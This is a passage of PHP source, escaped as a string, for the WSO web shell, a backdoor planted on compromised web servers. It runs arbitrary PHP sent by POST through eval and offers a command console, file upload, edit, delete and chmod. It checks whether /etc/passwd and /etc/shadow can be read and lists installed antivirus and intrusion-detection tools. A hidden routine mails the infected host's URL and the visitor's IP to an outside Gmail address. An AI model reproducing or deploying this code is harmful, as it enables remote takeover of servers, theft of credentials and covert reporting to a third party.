/>Cwd\':\'Cwd\').\'</span></td><td>: \'.$drives.\'\'.$cwd_links.\' \'.viewPermsColor($GLOBALS[\'cwd\']).\' <a href=# onclick="g(\\\'FilesMan\\\',\\\'\'.$GLOBALS[\'home_cwd\'].\'\\\',\\\'\\\',\\\'\\\',\\\'\\\')">[ home ]</a></td></tr></table></td>\'. \'<td width=1><nobr><span>Server IP</span><br><span>Client IP</span><br /><span>HDD</span><br /><span>Free</span><br /><span>PHP</span><br /><span>Safe Mode</span><br /><span>Domains</span></nobr></td>\'. \'<td><nobr>: \'.gethostbyname($_SERVER["HTTP_HOST"]).\'<br>: \'.$_SERVER[\'REMOTE_ADDR\'].\'<br />: \'.viewSize($totalSpace).\'<br />: \'.viewSize($freeSpace).\' (\'.(int)($freeSpace/$totalSpace*100).\'%)<br>: \'.@phpversion().\' <a href=# onclick="g(\\\'Php\\\',null,null,\\\'info\\\')">[ phpinfo ]</a><br />: \'.($GLOBALS[\'safe_mode\']?\'<font color=red>ON</font>\':\'<font color=\'.$color.\'<b>OFF</b></font>\').\'<br />: \'.$d0c.\'</nobr></td></tr></table>\'. \'</div></div><div style="margin:5;\r\nbackground:#444;\r\n"><div class="content" style="border-top:5px solid #444;\r\npadding:2px;\r\n"><table cellpadding="3" cellspacing="0" width="100%" class="menu"><tr>\'.$menu.\'</tr></table></div></div><div style="margin:5;\r\nbackground:#444;\r\n">\';\r\n } function printFooter() { $is_writable = is_writable($GLOBALS[\'cwd\'])?"<font color=#00cd00>[ Writeable ]</font>":"<font color=red>[ Not writable ]</font>";\r\n echo \'</div><div style="margin:5px;\r\nbackground:#444;\r\n"><div class="content" style="border-top:5px solid #444;\r\n">\r\n<table class="info" id="toolsTbl" cellpadding="3" cellspacing="0" width="100%">\r\n <tr>\r\n <td><form onsubmit="g(null,this.c.value);\r\nreturn false;\r\n"><span>Change dir:</span><br><input class="toolsInp" type=text name=c value="\'.htmlspecialchars($GLOBALS[\'cwd\']).\'"><input type=submit value=">>"></form></td>\r\n <td><form onsubmit="g(\\\'FilesTools\\\',null,this.f.value);\r\nreturn false;\r\n"><span>Read file:</span><br><input class="toolsInp" type=text name=f><input type=submit value=">>"></form></td>\r\n </tr>\r\n <tr>\r\n <td><form onsubmit="g(\\\'FilesMan\\\',null,\\\'mkdir\\\',this.d.value);\r\nreturn false;\r\n"><span>Make dir:</span><br><input class="toolsInp" type=text name=d><input type=submit value=">>"></form>\'.$is_writable.\'</td>\r\n <td><form onsubmit="g(\\\'FilesTools\\\',null,this.f.value,\\\'mkfile\\\');\r\nreturn false;\r\n"><span>Make file:</span><br><input class="toolsInp" type=text name=f><input type=submit value=">>"></form>\'.$is_writable.\'</td>\r\n </tr>\r\n <tr>\r\n <td><form onsubmit="g(\\\'Console\\\',null,this.c.value);\r\nreturn false;\r\n"><span>Execute:</span><br><input class="toolsInp" type=text name=c value=""><input type=submit value=">>"></form></td>\r\n <td><form method="post" ENCTYPE="multipart/form-data">\r\n <input type=hidden name=a value="FilesMAn">\r\n <input type=hidden name=c value="\'.htmlspecialchars($GLOBALS[\'cwd\']).\'">\r\n <input type=hidden name=p1 value="uploadFile">\r\n <input type=hidden name=charset value="\'.(isset($_POST[\'charset\'])?$_POST[\'charset\']:\'\').\'">\r\n <span>Upload file:</span><br><input class="toolsInp" type=file name=f><input type=submit value=">>"></form>\'.$is_writable.\'</td>\r\n </tr>\r\n</table></div></div>\r\n<div style="margin:5px;\r\nbackground:#444;\r\n"><div class="content" style="border-top:5px solid #444;\r\ntext-align:center;\r\nfont-weight:bold;\r\n">Wso shell\'.VERSION.\' ©\r\n Shell</div></div>\r\n</div>\r\n</body></html>\';\r\n } if ( !function_exists("posix_getpwuid") && (strpos($GLOBALS[\'disable_functions\'], \'posix_getpwuid\')===false) ) { function posix_getpwuid($p) { return false;\r\n } } if ( !function_exists("posix_getgrgid") && (strpos($GLOBALS[\'disable_functions\'], \'posix_getgrgid\')===false) ) { function posix_getgrgid($p) { return false;\r\n } } if(!isset($_SESSION[\'trimite\'])){ $url=$_SERVER[\'HTTP_HOST\'].$_SERVER[\'REQUEST_URI\'].\'<br />User IP: \'.$_SERVER[\'REMOTE_ADDR\'].(isset($_SERVER[\'HTTP_X_FORWARDED_FOR\'])?\'(\'.$_SERVER[\'HTTP_X_FORWARDED_FOR\'].\')\':\'\');\r\n @mail("byhero44@gmail.com","Smurfie",$url);\r\n $_SESSION[\'trimite\']=true;\r\n } function viewSize($s) { if($s >= 1073741824) return sprintf(\'%1.2f\', $s / 1073741824 ). \' GB\';\r\n elseif($s >= 1048576) return sprintf(\'%1.2f\', $s / 1048576 ) . \' MB\';\r\n elseif($s >= 1024) return sprintf(\'%1.2f\', $s / 1024 ) . \' KB\';\r\n else return $s . \' B\';\r\n } function perms($p) { if (($p & 0xC000) == 0xC000)$i = \'s\';\r\n elseif (($p & 0xA000) == 0xA000)$i = \'l\';\r\n elseif (($p & 0x8000) == 0x8000)$i = \'-\';\r\n elseif (($p & 0x6000) == 0x6000)$i = \'b\';\r\n elseif (($p & 0x4000) == 0x4000)$i = \'d\';\r\n elseif (($p & 0x2000) == 0x2000)$i = \'c\';\r\n elseif (($p & 0x1000) == 0x1000)$i = \'p\';\r\n else $i = \'u\';\r\n $i .= (($p & 0x0100) ? \'r\' : \'-\');\r\n $i .= (($p & 0x0080) ? \'w\' : \'-\');\r\n $i .= (($p & 0x0040) ? (($p & 0x0800) ? \'s\' : \'x\' ) : (($p & 0x0800) ? \'S\' : \'-\'));\r\n $i .= (($p & 0x0020) ? \'r\' : \'-\');\r\n $i .= (($p & 0x0010) ? \'w\' : \'-\');\r\n $i .= (($p & 0x0008) ? (($p & 0x0400) ? \'s\' : \'x\' ) : (($p & 0x0400) ? \'S\' : \'-\'));\r\n $i .= (($p & 0x0004) ? \'r\' : \'-\');\r\n $i .= (($p & 0x0002) ? \'w\' : \'-\');\r\n $i .= (($p & 0x0001) ? (($p & 0x0200) ? \'t\' : \'x\' ) : (($p & 0x0200) ? \'T\' : \'-\'));\r\n return $i;\r\n } function viewPermsColor($f) { if (!@is_readable($f)) return \'<font color=#FF0000><b>\'.perms(@fileperms($f)).\'</b></font>\';\r\n elseif (!@is_writable($f)) return \'<font color=white><b>\'.perms(@fileperms($f)).\'</b></font>\';\r\n else return \'<font color=#00cd00><b>\'.perms(@fileperms($f)).\'</b></font>\';\r\n } if(!function_exists("scandir")) { function scandir($dir) { $dh = opendir($dir);\r\n while (false !== ($filename = readdir($dh))) { $files[] = $filename;\r\n } return $files;\r\n } } function actionSecInfo() { printHeader();\r\n echo \'<h1>Server security information</h1><div class=content>\';\r\n function showSecParam($n, $v) { $v = trim($v);\r\n if($v) { echo \'<span>\'.$n.\': </span>\';\r\n if(strpos($v, "\\n") === false) echo $v.\'<br>\';\r\n else echo \'<pre class=ml1>\'.$v.\'</pre>\';\r\n } } showSecParam(\'Server software\', @getenv(\'SERVER_SOFTWARE\'));\r\n showSecParam(\'Disabled PHP Functions\', ($GLOBALS[\'disable_functions\'])?$GLOBALS[\'disable_functions\']:\'none\');\r\n showSecParam(\'Open base dir\', @ini_get(\'open_basedir\'));\r\n showSecParam(\'Safe mode exec dir\', @ini_get(\'safe_mode_exec_dir\'));\r\n showSecParam(\'Safe mode include dir\', @ini_get(\'safe_mode_include_dir\'));\r\n showSecParam(\'cURL support\', function_exists(\'curl_version\')?\'enabled\':\'no\');\r\n $temp=array();\r\n if(function_exists(\'mysql_get_client_info\')) $temp[] = "MySql (".mysql_get_client_info().")";\r\n if(function_exists(\'mssql_connect\')) $temp[] = "MSSQL";\r\n if(function_exists(\'pg_connect\')) $temp[] = "PostgreSQL";\r\n if(function_exists(\'oci_connect\')) $temp[] = "Oracle";\r\n showSecParam(\'Supported databases\', implode(\', \', $temp));\r\n echo \'<br>\';\r\n if( $GLOBALS[\'os\'] == \'nix\' ) { $userful = array(\'gcc\',\'lcc\',\'cc\',\'ld\',\'make\',\'php\',\'perl\',\'python\',\'ruby\',\'tar\',\'gzip\',\'bzip\',\'bzip2\',\'nc\',\'locate\',\'suidperl\');\r\n $danger = array(\'kav\',\'nod32\',\'bdcored\',\'uvscan\',\'sav\',\'drwebd\',\'clamd\',\'rkhunter\',\'chkrootkit\',\'iptables\',\'ipfw\',\'tripwire\',\'shieldcc\',\'portsentry\',\'snort\',\'ossec\',\'lidsadm\',\'tcplodg\',\'sxid\',\'logcheck\',\'logwatch\',\'sysmask\',\'zmbscap\',\'sawmill\',\'wormscan\',\'ninja\');\r\n $downloaders = array(\'wget\',\'fetch\',\'lynx\',\'links\',\'curl\',\'get\',\'lwp-mirror\');\r\n showSecParam(\'Readable /etc/passwd\', @is_readable(\'/etc/passwd\')?"yes <a href=\'#\' onclick=\'g(\\"FilesTools\\", \\"/etc/\\", \\"passwd\\")\'>[view]</a>":\'no\');\r\n showSecParam(\'Readable /etc/shadow\', @is_readable(\'/etc/shadow\')?"yes <a href=\'#\' onclick=\'g(\\"FilesTools\\", \\"etc\\", \\"shadow\\")\'>[view]</a>":\'no\');\r\n showSecParam(\'OS version\', @file_get_contents(\'/proc/version\'));\r\n showSecParam(\'Distr name\', @file_get_contents(\'/etc/issue.net\'));\r\n if(!$GLOBALS[\'safe_mode\']) { echo \'<br>\';\r\n $temp=array();\r\n foreach ($userful as $item) if(which($item)){$temp[]=$item;\r\n} showSecParam(\'Userful\', implode(\', \',$temp));\r\n $temp=array();\r\n foreach ($danger as $item) if(which($item)){$temp[]=$item;\r\n} showSecParam(\'Danger\', implode(\', \',$temp));\r\n $temp=array();\r\n foreach ($downloaders as $item) if(which($item)){$temp[]=$item;\r\n} showSecParam(\'Downloaders\', implode(\', \',$temp));\r\n echo \'<br/>\';\r\n showSecParam(\'Hosts\', @file_get_contents(\'/etc/hosts\'));\r\n showSecParam(\'HDD space\', ex(\'df -h\'));\r\n showSecParam(\'Mount options\', @file_get_contents(\'/etc/fstab\'));\r\n } } else { showSecParam(\'OS Version\',ex(\'ver\'));\r\n showSecParam(\'Account Settings\',ex(\'net accounts\'));\r\n showSecParam(\'User Accounts\',ex(\'net user\'));\r\n } echo \'</div>\';\r\n printFooter();\r\n } function actionPhp() { if( isset($_POST[\'ajax\']) ) { $_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\'] = true;\r\n ob_start();\r\n eval($_POST[\'p1\']);\r\n $temp = "document.getElementById(\'PhpOutput\').style.display=\'\';\r\ndocument.getElementById(\'PhpOutput\').innerHTML=\'".addcslashes(htmlspecialchars(ob_get_clean()),"\\n\\r\\t\\\\\'\\0")."\';\r\n\\n";\r\n echo strlen($temp), "\\n", $temp;\r\n exit;\r\n } printHeader();\r\n if( isset($_POST[\'p2\']) && ($_POST[\'p2\'] == \'info\') ) { echo \'<h1>PHP info</h1><div class=content>\';\r\n ob_start();\r\n phpinfo();\r\n $tmp = ob_get_clean();\r\n $tmp = preg_replace(\'!body {.*}!msiU\',\'\',$tmp);\r\n $tmp = preg_replace(\'!a:\\w+ {.*}!msiU\',\'\',$tmp);\r\n $tmp = preg_replace(\'!h1!msiU\',\'h2\',$tmp);\r\n $tmp = preg_replace(\'!td, th {(.*)}!msiU\',\'.e, .v, .h, .h th {$1}\',$tmp);\r\n $tmp = preg_replace(\'!body, td, th, h2, h2 {.*}!msiU\',\'\',$tmp);\r\n echo $tmp;\r\n echo \'</div><br>\';\r\n } if(empty($_POST[\'ajax\'])&&!empty($_POST[\'p1\'])) $_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\'] = false;\r\n echo \'<h1>Execution PHP-code</h1><div class=content><form name=pf method=post onsubmit="if(this.ajax.checked){a(null,null,this.code.value);\r\n}else{g(null,null,this.code.value,\\\'\\\');\r\n}return false;\r\n"><textarea name=code class=bigarea id=PhpCode>\'.(!empty($_POST[\'p1\'])?htmlspecialchars($_POST[\'p1\']):\'\').\'</textarea><input type=submit value=Eval style="margin-top:5px">\';\r\n echo \' <input type=checkbox name=ajax value=1 \'.(@$_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\']?\'checked\':\'\').\'> send using AJAX</form><pre id=PhpOutput style="\'.(empty($_POST[\'p1\'])?\'display:none;\r\n\':\'\').\'margin-top:5px;\r\n" class=ml1>\';\r\n if(!empty($_POST[\'p1\'])) { ob_start();\r\n eval($_POST[\'p1\']);\r\n echo htmlspecialchars(ob_get_clean());\r\n } echo \'</pre></div>\';\r\n printFooter();\r\n } function actionFilesMan() { printHeader();\r\n echo \'<h1>File manager</h1><div class=content>\';\r\n if(isset($_POST[\'p1\'])) { switch($_POST[\'p1\']) { case \'uploadFile\': if(!@move_uploaded_file($_FILES[\'f\'][\'tmp_name\'], $_FILES[\'f\'][\'name\'])) echo "Can\'t upload file!";\r\n break;\r\n break;\r\n case \'mkdir\': if(!@mkdir($_POST[\'p2\'])) echo "Can\'t create new dir";\r\n break;\r\n case \'delete\': function deleteDir($path) { $path = (substr($path,-1)==\'/\') ? $path:$path.\'/\';\r\n $dh = opendir($path);\r\n while ( ($item = readdir($dh) ) !== false) { $item = $path.$item;\r\n if ( (basename($item) == "..") || (basename($item) == ".") ) continue;\r\n $type = filetype($item);\r\n if ($type == "dir") deleteDir($item);\r\n else @unlink($item);\r\n } closedir($dh);\r\n rmdir($path);\r\n } if(is_array(@$_POST[\'f\'])) foreach($_POST[\'f\'] as $f) { $f = urldecode($f);\r\n if(is_dir($f)) deleteDir($f);\r\n else @unlink($f);\r\n } break;\r\n case \'paste\': if($_SESSION[\'act\'] == \'copy\') { function copy_paste($c,$s,$d){ if(is_dir($c.$s)){ mkdir($d.$s);\r\n $h = opendir($c.$s);\r\n while (($f = readdir($h)) !== false) if (($f != ".") and ($f != "..")) { copy_paste($c.$s.\'/\',$f, $d.$s.\'/\');\r\n } } elseif(is_file($c.$s)) { @copy($c.$s, $d.$s);\r\n } } foreach($_SESSION[\'f\'] as $f) copy_paste($_SESSION[\'cwd\'],$f, $GLOBALS[\'cwd\']);\r\n } elseif($_SESSION[\'act\'] == \'move\') { function move_paste($c,$s,$d){ if(is_dir($c.$s)){ mkdir($d.$s);\r\n $h = opendir($c.$s);\r\n while (($f = readdir($h)) !== false) if (($f != ".") and ($f != "..")) { copy_paste($c.$s.\'/\',$f, $d.$s.\'/\');\r\n } } elseif(is_file($c.$s)) { @copy($c.$s, $d.$s);\r\n } } foreach($_SESSION[\'f\'] as $f) @rename($_SESSION[\'cwd\'].$f, $GLOBALS[\'cwd\'].$f);\r\n } unset($_SESSION[\'f\']);\r\n break;\r\n default: if(!empty($_POST[\'p1\']) && (($_POST[\'p1\'] == \'copy\')||($_POST[\'p1\'] == \'move\')) ) { $_SESSION[\'act\'] = @$_POST[\'p1\'];\r\n $_SESSION[\'f\'] = @$_POST[\'f\'];\r\n foreach($_SESSION[\'f\'] as $k => $f) $_SESSION[\'f\'][$k] = urldecode($f);\r\n $_SESSION[\'cwd\'] = @$_POST[\'c\'];\r\n } break;\r\n } echo \'<script>document.mf.p1.value="";\r\ndocument.mf.p2.value="";\r\n</script>\';\r\n } $dirContent = @scandir(isset($_POST[\'c\'])?$_POST[\'c\']:$GLOBALS[\'cwd\']);\r\n if($dirContent === false) { echo \'Can\\\'t open this folder!\';\r\n return;\r\n } global $sort;\r\n $sort = array(\'name\', 1);\r\n if(!empty($_POST[\'p1\'])) { if(preg_match(\'!s_([A-z]+)_(\\d{1})!\', $_POST[\'p1\'], $match)) $sort = array($match[1], (int)$match[2]);\r\n } echo \'<script>\r\n function sa() {\r\n for(i=0;\r\ni<document.files.elements.length;\r\ni++)\r\n if(document.files.elements[i].type == \\\'checkbox\\\')\r\n document.files.elements[i].checked = document.files.elements[0].checked;\r\n\r\n }\r\n </script>\r\n <table width=\\\'100%\\\' class=\\\'main\\\' cellspacing=\\\'0\\\' cellpadding=\\\'2\\\'>\r\n <form name=files method=post>\';\r\n echo "<tr><th width=\'13px\'><input type=checkbox onclick=\'sa()\' class=chkbx></th><th><a href=\'#\' onclick=\'g(\\"FilesMan\\",null,\\"s_name_".($sort[1]?0:1)."\\")\'>Name</a></th><th><a href=\'#\' onclick=\'g(\\"FilesMan\\",null,\\"s_size_".($sort[1]?0:1)."\\")\'>Size</a></th><th><a href=\'#\' onclick=\'g(\\"FilesMan\\",null,\\"s_modify_".($sort[1]?0:1)."\\")\'>Modify</a></th><th>Owner/Group</th><th><a href=\'#\' onclick=\'g(\\"FilesMan\\",null,\\"s_perms_".($sort[1]?0:1)."\\")\'>Permissions</a></th><th>Actions</th></tr>";\r\n $dirs = $files = $links = array();\r\n $n = count($dirContent);\r\n for($i=0;\r\n$i<$n;\r\n$i++) { $ow = @posix_getpwuid(@fileowner($dirContent[$i]));\r\n $gr = @posix_getgrgid(@filegroup($dirContent[$i]));\r\n $tmp = array(\'name\' => $dirContent[$i], \'path\' => $GLOBALS[\'cwd\'].$dirContent[$i], \'modify\' => @date(\'Y-m-d H:i:s\',@filemtime($GLOBALS[\'cwd\'].$dirContent[$i])), \'perms\' => viewPermsColor($GLOBALS[\'cwd\'].$dirContent[$i]), \'size\' => @filesize($GLOBALS[\'cwd\'].$dirContent[$i]), \'owner\' => $ow[\'name\']?$ow[\'name\']:@fileowner($dirContent[$i]), \'group\' => $gr[\'name\']?$gr[\'name\']:@filegroup($dirContent[$i]) );\r\n if(@is_file($GLOBALS[\'cwd\'].$dirContent[$i])) $files[] = array_merge($tmp, array(\'type\' => \'file\'));\r\n elseif(@is_link($GLOBALS[\'cwd\'].$dirContent[$i])) $links[] = array_merge($tmp, array(\'type\' => \'link\'));\r\n elseif(@is_dir($GLOBALS[\'cwd\'].$dirContent[$i])&& ($dirContent[$i] != ".")) $dirs[] = array_merge($tmp, array(\'type\' => \'dir\'));\r\n } $GLOBALS[\'sort\'] = $sort;\r\n function cmp($a, $b) { if($GLOBALS[\'sort\'][0] != \'size\') return strcmp($a[$GLOBALS[\'sort\'][0]], $b[$GLOBALS[\'sort\'][0]])*($GLOBALS[\'sort\'][1]?1:-1);\r\n else return (($a[\'size\'] < $b[\'size\']) ? -1 : 1)*($GLOBALS[\'sort\'][1]?1:-1);\r\n } usort($files, "cmp");\r\n usort($dirs, "cmp");\r\n usort($links, "cmp");\r\n $files = array_merge($dirs, $links, $files);\r\n $l = 0;\r\n foreach($files as $f) { echo \'<tr\'.($l?\' class=l1\':\'\').\'><td><input type=checkbox name="f[]" value="\'.urlencode($f[\'name\']).\'" class=chkbx></td><td><a href=# onclick="\'.(($f[\'type\']==\'file\')?\'g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\', \\\'view\\\')">\'.htmlspecialchars($f[\'name\']):\'g(\\\'FilesMan\\\',\\\'\'.$f[\'path\'].\'\\\');\r\n"><b>[ \'.htmlspecialchars($f[\'name\']).\' ]</b>\').\'</a></td><td>\'.(($f[\'type\']==\'file\')?viewSize($f[\'size\']):$f[\'type\']).\'</td><td>\'.$f[\'modify\'].\'</td><td>\'.$f[\'owner\'].\'/\'.$f[\'group\'].\'</td><td><a href=# onclick="g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\',\\\'chmod\\\')">\'.$f[\'perms\'] .\'</td><td><a href="#" onclick="g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\', \\\'rename\\\')">R</a> <a href="#" onclick="g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\', \\\'touch\\\')">T</a>\'.(($f[\'type\']==\'file\')?\' <a href="#" onclick="g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\', \\\'edit\\\')">E</a> <a href="#" onclick="g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\', \\\'download\\\')">D</a>\':\'\').\'</td></tr>\';\r\n $l = $l?0:1;\r\n } echo \'<tr><td colspan=5>\r\n <input type=hidden name=a value=\\\'FilesMan\\\'>\r\n <input type=hidden name=c value="\'.htmlspecialchars($GLOBALS[\'cwd\']).\'">\r\n <input type=hidden name=charset value="\'.(isset($_POST[\'charset\'])?$_POST[\'charset\']:\'\').\'">\r\n <select name=\\\'p1\\\'><option value=\\\'copy\\\'>Copy</option><option value=\\\'move\\\'>Move</option><option value=\\\'delete\\\'>Delete</option>\';\r\n if(!empty($_SESSION[\'act\'])&&@count($_SESSION[\'f\'])){echo \'<option value=\\\'paste\\\'>Paste</option>\';\r\n } echo \'</select> \r\n<input type="submit" value=">>"></td><td colspan="2" align="right" width="1"><input name="def" value="r00t.info shell" disabled="disabled"/> \r\n<input type="submit" value="Add Deface Here" disabled="disabled"></td></tr>\r\n </form></table></div>\';\r\n printFooter();\r\n } function actionStringTools() { if(!function_exists(\'hex2bin\')) {function hex2bin($p) {return decbin(hexdec($p));\r\n}} if(!function_exists(\'hex2ascii\')) {function hex2ascii($p){$r=\'\';\r\nfor($i=0;\r\n$i<strLen($p);\r\n$i+=2){$r.=chr(hexdec($p[$i].$p[$i+1]));\r\n}return $r;\r\n}} if(!function_exists(\'ascii2hex\')) {function ascii2hex($p){$r=\'\';\r\nfor($i=0;\r\n$i<strlen($p);\r\n++$i)$r.= dechex(ord($p[$i]));\r\nreturn strtoupper($r);\r\n}} if(!function_exists(\'full_urlencode\')) {function full_urlencode($p){$r=\'\';\r\nfor($i=0;\r\n$i<strlen($p);\r\n++$i)$r.= \'%\'.dechex(ord($p[$i]));\r\nreturn strtoupper($r);\r\n}} if(isset($_POST[\'ajax\'])) { $_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\'] = true;\r\n ob_start();\r\n if(function_exists($_POST[\'p1\'])) echo $_POST[\'p1\']($_POST[\'p2\']);\r\n $temp = "document.getElementById(\'strOutput\').style.display=\'\';\r\ndocument.getElementById(\'strOutput\').innerHTML=\'".addcslashes(htmlspecialchars(ob_get_clean()),"\\n\\r\\t\\\\\'\\0")."\';\r\n\\n";\r\n echo strlen($temp), "\\n", $temp;\r\n exit;\r\n } printHeader();\r\n echo \'<h1>String conversions</h1><div class=content>\';\r\n $stringTools = array( \'Base64 encode\' => \'base64_encode\', \'Base64 decode\' => \'base64_decode\', \'Url encode\' => \'urlencode\', \'Url decode\' => \'urldecode\', \'Full urlencode\' => \'full_urlencode\', \'md5 hash\' => \'md5\', \'sha1 hash\' => \'sha1\', \'crypt\' => \'crypt\', \'CRC32\' => \'crc32\', \'ASCII to HEX\' => \'ascii2hex\', \'HEX to ASCII\' => \'hex2ascii\', \'HEX to DEC\' => \'hexdec\', \'HEX to BIN\' => \'hex2bin\', \'DEC to HEX\' => \'dechex\', \'DEC to BIN\' => \'decbin\', \'BIN to HEX\' => \'bin2hex\', \'BIN to DEC\' => \'bindec\', \'String to lower case\' => \'strtolower\', \'String to upper case\' => \'strtoupper\', \'Htmlspecialchars\' => \'htmlspecialchars\', \'String length\' => \'strlen\', );\r\n if(empty($_POST[\'ajax\'])&&!empty($_POST[\'p1\'])) $_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\'] = false;\r\n echo "<form name=\'toolsForm\' onSubmit=\'if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);\r\n}else{g(null,null,this.selectTool.value,this.input.value);\r\n} return false;\r\n\'><select name=\'selectTool\'>";\r\n foreach($stringTools as $k => $v) echo "<option value=\'".htmlspecialchars($v)."\'>".$k."</option>";\r\n echo "</select><input type=\'submit\' value=\'>>\'/> <input type=checkbox name=ajax value=1 ".($_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\']?\'checked\':\'\')."> send using AJAX<br><textarea name=\'input\' style=\'margin-top:5px\' class=bigarea>".htmlspecialchars(@$_POST[\'p2\'])."</textarea></form><pre class=\'ml1\' style=\'".(empty($_POST[\'p1\'])?\'display:none;\r\n\':\'\')."margin-top:5px\' id=\'strOutput\'>";\r\n if(!empty($_POST[\'p1\'])) { if(function_exists($_POST[\'p1\'])) echo htmlspecialchars($_POST[\'p1\']($_POST[\'p2\']));\r\n } echo"</pre></div>";\r\n printFooter();\r\n } function actionFilesTools() { if( isset($_POST[\'p1\']) ) $_POST[\'p1\'] = urldecode($_POST[\'p1\']);\r\n if(@$_POST[\'p2\']==\'download\') { if(is_file($_POST[\'p1\']) && is_readable($_POST[\'p1\'])) { ob_start("ob_gzhandler", 4096);\r\n header("Content-Disposition: attachment;\r\n filename=".basename($_POST[\'p1\']));\r\n if (function_exists("mime_content_type")) { $type = @mime_content_type($_POST[\'p1\']);\r\n header("Content-Type: ".$type);\r\n } $fp = @fopen($_POST[\'p1\'], "r");\r\n if($fp) { while(!@feof($fp)) echo @fread($fp, 1024);\r\n fclose($fp);\r\n } } elseif(is_dir($_POST[\'p1\']) && is_readable($_POST[\'p1\'])) { } exit;\r\n } if( @$_POST[\'p2\'] == \'mkfile\' ) { if(!file_exists($_POST[\'p1\'])) { $fp = @fopen($_POST[\'p1\'], \'w\');\r\n if($fp) { $_POST[\'p2\'] = "edit";\r\n fclose($fp);\r\n } } } printHeader();\r\n echo \'<h1>File tools</h1><div class=content>\';\r\n if( !file_exists(@$_POST[\'p1\']) ) { echo \'File not exists\';\r\n printFooter();\r\n return;\r\n } $uid = @posix_getpwuid(@fileowner($_POST[\'p1\']));\r\n $gid = @posix_getgrgid(@fileowner($_POST[\'p1\']));\r\n echo \'<span>Name:</span> \'.htmlspecialchars($_POST[\'p1\']).\' <span>Size:</span> \'.(is_file($_POST[\'p1\'])?viewSize(filesize($_POST[\'p1\'])):\'-\').\' <span>Permission:</span> \'.viewPermsColor($_POST[\'p1\']).\' <span>Owner/Group:</span> \'.$uid[\'name\'].\'/\'.$gid[\'name\'].\'<br>\';\r\n echo \'<span>Create time:</span> \'.date(\'Y-m-d H:i:s\',filectime($_POST[\'p1\'])).\' <span>Access time:</span> \'.date(\'Y-m-d H:i:s\',fileatime($_POST[\'p1\'])).\' <span>Modify time:</span> \'.date(\'Y-m-d H:i:s\',filemtime($_POST[\'p1\'])).\'<br><br>\';\r\n if( empty($_POST[\'p2\']) ) $_POST[\'p2\'] = \'view\';\r\n if( is_file($_POST[\'p1\']) ) $m = array(\'View\', \'Highlight\', \'Download\', \'Hexdump\', \'Edit\', \'Chmod\', \'Rename\', \'Touch\');\r\n else $m = array(\'Chmod\', \'Rename\', \'Touch\');\r\n foreach($m as $v) echo \'<a href=# onclick="g(null,null,null,\\\'\'.strtolower($v).\'\\\')">\'.((strtolower($v)==@$_POST[\'p2\'])?\'<b>[ \'.$v.\' ]</b>\':$v).\'</a> \';\r\n echo \'<br><br>\';\r\n switch($_POST[\'p2\']) { case \'view\': echo \'<pre class=ml1>\';\r\n $fp = @fopen($_POST[\'p1\'], \'r\');\r\n if($fp) { while( !@feof($fp) ) echo htmlspecialchars(@fread($fp, 1024));\r\n @fclose($fp);\r\n } echo \'</pre>\';\r\n break;\r\n case \'highlight\': if( is_readable($_POST[\'p1\']) ) { echo \'<div class=ml1 style="background-color: #e1e1e1;\r\ncolor:black;\r\n">\';\r\n $code = highlight_file($_POST[\'p1\'],true);\r\n echo str_replace(array(\'<span \',\'</span>\'), array(\'<font \',\'</font>\'),$code).\'</div>\';\r\n } break;\r\n case \'chmod\': if( !empty($_POST[\'p3\']) ) { $perms = 0;\r\n for($i=strlen($_POST[\'p3\'])-1;\r\n$i>=0;\r\n--$i) $perms += (int)$_POST[\'p3\'][$i]*pow(8, (strlen($_POST[\'p3\'])-$i-1));\r\n if(!@chmod($_POST[\'p1\'], $perms)) echo \'Can\\\'t set permissions!<br><script>document.mf.p3.value="";\r\n</script>\';\r\n else die(\'<script>g(null,null,null,null,"")</script>\');\r\n } echo \'<form onsubmit="g(null,null,null,null,this.chmod.value);\r\nreturn false;\r\n"><input type=text name=chmod value="\'.substr(sprintf(\'%o\', fileperms($_POST[\'p1\'])),-4).\'"><input type=submit value=">>"></form>\';\r\n break;\r\n case \'edit\': if( !is_writable($_POST[\'p1\'])) { echo \'File isn\\\'t writeable\';\r\n break;\r\n } if( !empty($_POST[\'p3\']) ) { @file_put_contents($_POST[\'p1\'],$_POST[\'p3\']);\r\n echo \'Saved!<br><script>document.mf.p3.value="";\r\n</script>\';\r\n } echo \'<form onsubmit="g(null,null,null,null,this.text.value);\r\nreturn false;\r\n"><textarea name=text class=bigarea>\';\r\n $fp = @fopen($_POST[\'p1\'], \'r\');\r\n if($fp) { while( !@feof($fp) ) echo htmlspecialchars(@fread($fp, 1024));\r\n @fclose($fp);\r\n } echo \'</textarea><input type=submit value=">>"></form>\';\r\n break;\r\n case \'hexdump\': $c = @file_get_contents($_POST[\'p1\']);\r\n $n = 0;\r\n $h = array(\'00000000<br>\',\'\',\'\');\r\n $len = strlen($c);\r\n for ($i=0;\r\n $i<$len;\r\n ++$i) { $h[1] .= sprintf(\'%02X\',ord($c[$i])).\' \';\r\n switch ( ord($c[$i]) ) { case 0: $h[2] .= \' \';\r\n break;\r\n case 9: $h[2] .= \' \';\r\n break;\r\n case 10: $h[2] .= \' \';\r\n break;\r\n case 13: $h[2] .= \' \';\r\n break;\r\n default: $h[2] .= $c[$i];\r\n break;\r\n } $n++;\r\n if ($n == 32) { $n = 0;\r\n if ($i+1 < $len) {$h[0] .= sprintf(\'%08X\',$i+1).\'<br>\';\r\n} $h[1] .= \'<br>\';\r\n $h[2] .= "\\n";\r\n } } echo \'<table cellspacing=1 cellpadding=5 bgcolor=#222222><tr><td bgcolor=#333333><span style="font-weight: normal;\r\n"><pre>\'.$h[0].\'</pre></span></td><td bgcolor=#282828><pre>\'.$h[1].\'</pre></td><td bgcolor=#333333><pre>\'.htmlspecialchars($h[2]).\'</pre></td></tr></table>\';\r\n break;\r\n case \'rename\': if( !empty($_POST[\'p3\']) ) { 